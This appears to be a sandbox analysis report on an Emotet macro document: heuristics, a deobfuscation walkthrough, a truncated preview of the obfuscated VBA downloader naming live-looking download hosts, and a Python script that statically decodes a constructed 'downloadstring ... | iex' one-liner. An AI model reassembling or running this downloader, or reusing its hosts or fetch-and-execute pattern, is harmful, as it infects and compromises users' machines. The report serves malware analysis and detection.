Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample fires the critical OLE_VBA_SHELL heuristic (a Shell() call inside the VBA project) together with an AutoOpen entry point, so the macro executes as soon as the document is opened with macros enabled. ClamAV classifies the file as Doc.Macro.Emotet-6374344-0; the module name 'macros.bas' is only the analyzer's output filename and carries no signal of its own. The VBA is heavily obfuscated: every string literal is a Mid() slice cut from a longer junk literal, padded with variables that are not assigned anywhere in the preview (an uninitialised Variant concatenates as an empty string). Even so, the visible slices reconstruct a PowerShell downloader of the kind Emotet's maldocs carried. Both $ShellID[1]+$ShellID[13]+'X' and $env:PUBLIC[13]+$env:PUBLIC[5]+'x' resolve to iex; the junk tokens wfd and 7M0 are mapped to [char]39 (a single quote) and JCl and Ktq to [char]36 (a dollar sign) by the script's own -Replace/.Replace() chain; and a new-object System.Net.WebClient is driven from a try/catch loop that calls DownloadFile for each URL in a comma-separated list, appears to save the result under $env:PUBLIC with a name drawn from new-object random, runs Invoke-Item on it and breaks on the first success. Two hosts are fully visible in the preview (monitoreointeligente.com.ar and remont-shlangov.ru); the remaining entries of the URL list are cut off where the preview is truncated. One inconsistency to note: OLE_LEGACY_WORDBASIC_AUTOEXEC reports that no modern VBA project was recovered, which the extracted macros.bas contradicts, so treat that heuristic as a generic AutoOpen marker rather than an independent finding.
Heuristics (8)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
- OLE_VBA_MACROS (medium, 3 related findings): document contains VBA macro code
- OLE_VBA_SHELL (critical): Shell() call in VBA
- OLE_VBA_AUTOOPEN (high): AutoOpen macro
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- EXTRACTED_FILE_STATIC_TRIAGE (info): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- EMBEDDED_URL (info): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that Office writes into documents, not an attacker-controlled address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51255 bytes |

SHA-256: 3dc55cb19a93aa22b97e2c646b29064ff5dd7a760e71d4a9c781a899ed723138

Detection (for this artifact):
- ClamAV: no threats found. The Doc.Macro.Emotet signature listed above matched the container document; it did not fire on the decoded VBA source.
- Obfuscation or payload: likely. The carved artifact contains 34 long base64-like blobs. Given the Mid() slicing seen in the preview, these are most likely the junk literals the slices are cut from rather than an encoded payload, so decoding them as base64 is not expected to yield anything useful.
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "IfAEzLjvV"
Function iFCNHnzZS()
MqITtjM = "" + CRwUjkW + Mid("DR27KK5YrSr71nsVpMUVCHsokULcJXwKv9sQf", 11, 2) + mGcPltr + UDknDXG
mnvstSMsC = "" + InddJMj + Mid("ItKF24ZmUBVQ4MimoX2SvtVKMC 343245);K7M0+7M0tqhuas = Kt7M0+7M0qenv7M0wfd+wfd+7M0:public 7M0+7M0+ fo7'+'M0+7M0wfd+wfdh7M0+7M0r'+'JAfoh7M0+7M0 7M0+7M0+ Ktqk7M0+7M0ar7M0+7K9fm", 27, 141) + KUonRSh + iubNjtR
ZGCnwhSDh = "" + JZOucpi + Mid("LRfKI+'M0-JoIn7M07M0)wfd) -'+'RepLacewfd7M0wfd,'+'[ChAR]'+'39-cREPl'+'ACe([Ch'+'AR'+']72+7rVdGf5j9DzRsrQCbwq", 6, 84) + GzjXsXj + LPozNIO
bdiZFbiQN = "" + zlQcWSw + Mid("RHs1),[Ch'+'AR]36))') -RepLAce'JCl',[char]36-cRePlAce'wfd',[char]39)|&( $shelLid[1]+$ShelLID[13]+'X')vAw7B68sjC", 4, 98) + FIThPRs + kwcmich
fLfhSqjOF = "" + jlmwlmV + Mid("hta6nQtGfKILlbwTlj8k09sjSVztRM0+7M0u/Uamu'+'Kwfd+wfd7M0+7M0Mpu/,httpJYFG7VfMl", 30, 39) + fuwZoiU + zzzITPq
MsjHILdHwA = "" + AlqvPOG + Mid("0oCCQAYKibcGEa7Ktq'+'bcd){try{7M0+7M0Ktqf7M0+7M0ranc7M0+7M0.Down'+'wfd+wfd7M0+7M0loadFile(Ktqabcwfd+wfd.T7M0+7M0oS7M0+7M0t7M0+7M0r7M0+'+'7M0ingwfd+wfd(7M0+7M0)wi0zsCmLfjdzj", 16, 144) + jMlGtvG + rppALTm
GVRDFcENW = "" + SYAbISW + Mid("QEdIWV6BHN05EcnEquivqPjuMXhaR]39).RePLAce(7M0rJA7M0,7M047t'+'7M0).RePLAc'+'e(7M0Ktq7M0,[stRIngwfd+wfd][ChaR]36) H1Y& ( Vo3VerboSepReFErEnCE.toStwfd+wfdR'+'i'+'nG()[1,3]+'+'7M0X7'REUKN", 27, 152) + GEwRGzb + SbWvFwh
jBLNYC = "" + AkLUjzV + Mid("kGd+wfd7M0+7M0t K7M0+7M0tq_7M0+7M0.Ex7M0+7M0cept7M0+7M0i7M0+7M0o7M0+7M0n7M0+7M'+'0.wfd+3ENwKhCLuaMqSqfBhjc6d16nairo8", 3, 85) + vrLDDzk + ZJDCfBW
urtJHAtDi = "" + kkPkvFP + Mid("Yr2asQ1T[ChAR]49+[ChAR]89),[ChAR]124 -RepLa'+'ce([jUqiwWYmX5X5VDBHFGKrq2IYtiHL", 9, 43) + kAzwpli + jEwVuGE
dFnNA = "" + muGRiuE + Mid("At71iYMBLqnsadawfd+wfdsd 7M0+7M0= 7M0+7M0n'+'ew-ob7M0+7M0ject r7M0+7M0andom7M0+7MHZ", 10, 72) + TfsIjvv + XiGUhih
amiINnv = "" + PdcKCka + Mid("zkQafWi95kB4YEjaKcmmU99r1wfdMess7M0+7M0wfd+w'+'fda7M0+7M0ge;'+'}7M0+7M0}7M0).RePLAce(7M0foh7M0,[wfd+wfdstRIng][CaCdEj7UlQUL1b", 26, 87) + XTFRQJR + roFulcZ
aZZUwVtPj = "" + sWczjzz + Mid("bmXrYPA, Ktqh7M'+'0+7M0uas7M0+7M0);Iwfd+wf'+'dnvoke-I7M'+'0+7M0te7M'+'0+7M0m(Kt7M0+7M0qhu7M0+'+'7M0as);break;}c7M0+7M0atch{wr7M0'+'+'+'7M0ite-hoswfVzL", 8, 140) + OkHKjGs + tLfodcf
hwduwfEF = "" + Rotcnjs + Mid("5mhrT+7wfd+wfdM0i7M0+7M0e7M0+7M0n7'+'M0+7M0t;Ktwfd+wfd7M0+7M0YBpjl", 6, 56) + NaoaTQO + zorrzsh
ZohkRVsnvfh = "" + vAovHaq + Mid("dY2O0RGre/Tx7M0+7M0Kvj/'+'foh.7M0+7M0Split(f7M0+7M0oh,f7M0+7M0oh);K7'+'M0+wfd+wf'+'d7M0t7wfd+wfdM0+7M0q7M0+7M0k7M0+7M0a7M0+7M0rapas = K7M0+7M0tq'+'7M0+7M0nsawfd+wfdda7M0+7M0sd'+'.ne'+'7M0+7M0xt(17M0+7M0,PPK9uwk5GvVH", 8, 196) + aSstQnw + zGQDAGF
SiaFE = "" + CClHUIX + Mid("5q48NbDjQwfd+w'+'fd0wfd+wfd+7M0O/7M0+7M0,h7M0+7M0ttp://mo7M0+7M0nit'+'o7M0+7M0reointelig'+'ente.c7M0+7M0om.ar/7M0+7M0gkN7M0+7M0uNKlYK/,7'+'M0+7M'+'0htt7M0+7M0pwfd+wfd://eda7M0+7M0vspb.vWpNiUzs", 10, 175) + tzTJWYc + asJmlsJ
XmuLZ = "" + Stmzfzz + Mid("QuBdXiZZr522AXJwBWtI (('. ( JClenv:PUbLIC[13]+JCleNV:'+'PublIC[5]+'+'wfdxwfd)(((wfd (7M0K'+'7M0+7M0tq7M0+7M0fr7M0+7M0anc = new7M0+7M0-ob7M0+7M0ject Syste7M0+7M0m.Net.Web7M0wfd+wfd+7M0Cl7M097Yo", 21, 168) + jlXhdJf + ziWzjKG
HWzUqSOjD = "" + AoMMsPc + Mid("IbZQXCb0quTj10Q4WFAfiOjZ7M0+7M0:7M0+7M0//re7M0+7M0mon7M0+7M0t-sh7M0+7M0la7M0+7M0n'+'go7M0+wfd+wfd7M0v.7M0+7M0ru/Q/,7M0+7M0http:7M0+7M0//7'+'M0+7M0www.l7M0+7M0edpu7jijJRfwbr", 25, 139) + KEqZppL + KFatIuU
XALmv = "" + nUSqvOf + Mid("LWYFjw4nE0;K7M0+wfd+wfd7M0t7M0+7wfd+wfdM0qb7M'+'0+7M0c7M0+7M0d7wfd+wfdM0+7M0 7Mwfd+wfd0+7M0= fo7M0+7M0hhttp7M0+7M0://wfd+wfdremont-br7M0wfd+wfd+7M0i'+'7M0+7M0tv.'+'r7bIN6hRQqu", 10, 157) + zPiUMTK + qdCfvzf
zriUmw = "" + bRwFYKb + Mid("vfpt9EwcdN8O7pM0+7M0blicid'+'ad'+'7M0+7M0.'+'com/7M0+7M0j7M0+7M0t7M0+7M0vsZ7Mnn5T2hHZG", 15, 63) + rUvowZc + vZmlBRh
HJhtbaUCC = "" + jpZUtvi + Mid("pF74M0+7M0u/7M0+7'+'
```
... (truncated)
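The obfuscation shown in the preview is mechanical enough to undo statically, and the checks the heuristics above encode (AutoOpen, a Shell() call) are cheap to reproduce. The script below is an added example, not the analyzer's own code and not derived from the sample: it runs over a constructed VBA module written in the same style (invented variable names, invented junk padding, a reserved example.invalid URL, and a command that is not a payload). It flags the execution surface, reassembles the Mid() slices in the order the Shell() call joins them (VBA's Mid() is 1-based, so Mid("abcdef", 2, 3) is "bcd"; an off-by-one shifts every recovered fragment), applies the token substitutions an analyst reads off the script's own -Replace chain, and resolves the $ShellID / $env:PUBLIC character-indexing trick that spells iex. The token map (7M0 to a quote) and the two indexed variable values are assumptions stated in the code; for the real sample the map would be the wfd/7M0/JCl/Ktq pairs from the preview, and the join order would have to come from wherever the truncated module concatenates its variables.

```python
"""Static triage of a VBA module extracted with olevba.

Added example, not the analyzer's code; no string below is taken from the sample.
It reproduces what an analyst does by hand with a macro like the one previewed
above: flag the execution surface (AutoOpen + Shell), reassemble the Mid()
slices that the obfuscator concatenates at run time (VBA's Mid() is 1-based,
so Mid("abcdef", 2, 3) is "bcd"), substitute the junk tokens named in the
script's own -Replace chain, and resolve the $ShellID / $env:PUBLIC indexing
trick that spells "iex" without the literal ever appearing.
"""
import re

# Constructed sample in the style of the preview; variable names, junk padding
# and the example.invalid URL are invented and the command is not a payload.
SAMPLE_VBA = '''Attribute VB_Name = "Demo"
Sub AutoOpen()
    Call Launcher
End Sub
Function Launcher()
    a1 = "" + jA + Mid("k9Qpowershell -nop -w hidden -c 2fV", 4, 29) + jB
    a2 = "" + jC + Mid("Uv(new-object net.webclient).downloadstring(7M0http://example.invalid/x7M0)Tr", 3, 73) + jD
    a3 = "" + jE + Mid("q8W|&($shellid[1]+$shellid[13]+7M0X7M0)N", 4, 36) + jF
    Shell a1 + a2 + a3, vbHide
End Function
'''

ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.*)$")
MID_CALL = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')
SHELL_CALL = re.compile(r"\bShell\b\s*\(?\s*([^,\n)]+)", re.IGNORECASE)
INDEX_REF = re.compile(r"(\$(?:shellid|env:public))\[(\d+)\]", re.IGNORECASE)

# Assumed values of these automatic variables on a default Windows/PowerShell install.
INDEXED = {"$shellid": "Microsoft.PowerShell", "$env:public": r"C:\Users\Public"}


def triage(src):
    """The cheap heuristics: an auto-exec entry point and a Shell() call."""
    low = src.lower()
    return {
        "autoopen": "sub autoopen" in low or "sub document_open" in low,
        "shell_call": re.search(r"\bshell\b", low) is not None,
        "mid_slices": len(MID_CALL.findall(src)),
    }


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start; a start past the end yields an empty string."""
    if start < 1:
        raise ValueError("VBA Mid() start must be >= 1")
    return s[start - 1 : start - 1 + length]


def recover_fragments(src):
    """Map each assigned variable to the concatenation of its Mid() slices.
    The unassigned padding variables are Variant Empty and contribute nothing."""
    frags = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        pieces = [vba_mid(lit, int(a), int(b)) for lit, a, b in MID_CALL.findall(m.group(2))]
        if pieces:
            frags[m.group(1)] = "".join(pieces)
    return frags


def shell_argument_order(src):
    """The Shell() call fixes the order in which the fragments are joined."""
    m = SHELL_CALL.search(src)
    return [v.strip() for v in m.group(1).split("+")] if m else []


def rebuild_command(src):
    frags = recover_fragments(src)
    return "".join(frags.get(v, v) for v in shell_argument_order(src))


def strip_tokens(cmd, tokens):
    """Apply the (token, replacement) pairs read from the script's -Replace chain."""
    for token, char in tokens:
        cmd = cmd.replace(token, char)
    return cmd


def resolve_indexed_chars(cmd):
    """Turn $shellid[1]+$shellid[13]+'X' into 'ieX', i.e. Invoke-Expression."""
    cmd = INDEX_REF.sub(lambda m: "'" + INDEXED[m.group(1).lower()][int(m.group(2))] + "'", cmd)
    return re.sub(r"'\+'", "", cmd)  # merge adjacent single-quoted literals


def analyze(src, tokens=(("7M0", "'"),)):
    """Run the whole chain; the default token map is the constructed sample's."""
    cmd = strip_tokens(rebuild_command(src), tokens)
    return {"flags": triage(src), "command": resolve_indexed_chars(cmd)}


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    print(result["flags"])
    print(result["command"])
```

Running it prints the three flags and the recovered one-liner, with the WebClient call and the iex invocation in plain text. The recovery is static: nothing from the macro or from PowerShell is executed, which is the point of doing it this way on a sample whose URL list is only partly visible.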